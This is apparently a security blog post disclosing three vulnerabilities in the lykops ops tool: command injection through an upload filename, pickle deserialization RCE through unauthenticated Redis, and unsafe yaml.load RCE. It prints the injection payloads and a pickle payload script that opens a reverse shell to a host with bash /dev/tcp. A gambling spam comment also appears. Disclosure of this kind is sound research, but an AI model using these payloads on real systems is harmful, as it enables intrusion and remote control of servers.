跳至主要内容

lykops has multiple vulnerabilities

corresponding 0x00    intro

- github repo:https://github.com/lykops/lykops
- 121 stars and 65 forks til 2021/2/6





0x01    Post-Auth OS-command injection

lykops/library/utils/file.py#248 ->upload_file()





we got lykops/lykops/ansible/yaml.py#74,github link here

vuln param file comes from our HTTP Request in array of FILES[] 


So we can completely control the unsantized param, and cause a OS-cmd injection


  1. the corresponding route is ^ansible/yaml/import$, we can trigger this vuln by visiting it.
  2. Also, you can see that an exception will trigger twice invocations  of import_file(),which means a `sleep 5`  command will casue a delay of 10 second


POST /ansible/yaml/import/ 
Host: lykops
...

...
...;filename="test.txt$(sleep 5)"
...



0x02    Pre-Auth pickle Unserialized RCE via Unauthorized Redis

route of Login,is ^login.html,the corresponding implementation is Login->login function


Follow up get_userinfo , it is found that the user's login cache is retrieved from Redis.


Line 81, passed in user=adminuser Variable, we get it by searching the variable name globally adminuser The default value is lykops





Further, Redis uses String , in order to convert to Python Object , there must be a deserialization implementation. 
If The deserialization restriction is improper, there will be a vulnerability-what function does it use to deserialize? 


pickle.loads! this evil function! 

This get The implementation of, in the input parameter is fmt=obj When deserialization from Redis achieved in 字符串 ], and the deserialization function is actually used pickle.loads !

If you are not familiar with Python deserialization attacks, see python deserialization attacks from scratch This post.

The following figure shows a demo that uses deserialization to run commands in Python cmdline. 







So the script for generating the payload is as follows:

#!/usr/bin/env python3
import pickle
import os

class py():
    def __reduce__(self):
        return (os.system, ('bash -i >& /dev/tcp/10.10.111.2/1337 0>&1',))

payload = pickle.dumps(py()) 
# b'\x80\x03cposix\nsystem\nq\x00X)\x00\x00\x00bash -i >& /dev/tcp/10.10.111.1/1337 0>&1q\x01\x85q\x02Rq\x03.'

#!/usr/bin/env python3
import pickle
import os

class py():
  def __reduce__(self):
    return (os.system, ('bash -i >& /dev/tcp/10.10.111.2/1337 0>&1',))

payload = pickle.dumps(py()) 
# b'\x80\x03cposix\nsystem\nq\x00X)\x00\x00\x00bash -i >& /dev/tcp/10.10.111.1/1337 0>&1q\x01\x85q\x02Rq\x03.'











0x03    Post-Auth YAML Unserialized RCE

Firstly, people should know that unproperly use yaml.load
will cause Python Arbitrary Object  Loads, which in most cases means a RCE.

To find original tutorials, visit the tutotials of https://pyyaml.org/wiki/PyYAMLDocumentation#Tutorial

Loading YAML

Warning: It is not safe to call yaml.load with any data received from an untrusted source! yaml.load is as powerful as pickle.load and so may call any Python function. Check the yaml.safe_load function though.


Searching for yaml.load and got this , library/utils/yaml.py#27 , github link here





























invocation is from yaml_loader (), which is trigged in upload function

!!python/object/new:os.system ["sleep 2"]

So we got an Post-Auth RCE
























the sorce is in  library/utils/file.pygithub link here










评论

  1. Bet on Sports Online Betting with the Sportsbook - Tềng ĐỀng Đạng
    ➨ We offer betting with best odds with great ボンズ カジノ live betting. 1xbet Online sports betting is one of the most popular ways sbobet ทางเข้า of

    回复删除

发表评论

此博客中的热门博文

Thinksaas has a Post-Auth SQL injection vulnerability in app/topic/action/admin/topic.php

1. Intro of this CMS The repo of ThinksaasS is located at https://github.com/thinksaas/ThinkSAAS , quite a common-used CMS. Source code of v3.38  could be downloaded at https://www.thinksaas.cn/service/down/ , while passcode of downlaoding is thinksaas9999 of this Vuln ThinkSAAS before 3.38 has SQL injection via the /index.php?app=topic&ac=admin&mg=topic&ts=list&title=PoC title parameter, allowing remote attackers to execute arbitrary SQL commands. 2. Walkthrough Code Review Risky lines are here =>   https://github.com/thinksaas/ThinkSAAS/blob/b0361f49cb026ad33b7df6b15539bec6dadd24b0/app/topic/action/admin/topic.php#L42 https://github.com/thinksaas/ThinkSAAS/blob/b0361f49cb026ad33b7df6b15539bec6dadd24b0/thinksaas/tsApp.php#L146 Due to unproper conjunction of SQL query sentences (1) and invalid filter (2) (1) unproper conjunction of SQL query sentences app/topic/action/admin/topic.php#L42 Let's see how findAll() works: thinksaas/tsApp.php#L1

MKCMS V6.2 has mutilple vulnerabilities

0x00:Lead In Source code can be downloaded  at  https://www.lanzous.com/ib7zwmh This CMS is kinda funny, coz there is a universal filter addslashes  in /system/library.php /system/library.php <?php ... if ( ! get_magic_quotes_gpc ()) { if ( ! empty ( $_GET )) { $_GET = addslashes_deep ( $_GET ); } if ( ! empty ( $_POST )) { $_POST = addslashes_deep ( $_POST ); } $_COOKIE = addslashes_deep ( $_COOKIE ); $_REQUEST = addslashes_deep ( $_REQUEST ); } function addslashes_deep ( $_var_0 ) { if ( empty ( $_var_0 )) { return $_var_0 ; } else { return is_array ( $_var_0 ) ? array_map ( 'addslashes_deep' , $_var_0 ) : addslashes ( $_var_0 ); } _var_0 } While it uses stripslashes somewhere by mistake, let's do a global search about it, we get 3 SQL injections 0x01:PreAuth SQL injection in /ucenter/repass.php MKCMS V6.2 has SQL injection via the /ucenter/repass.php nam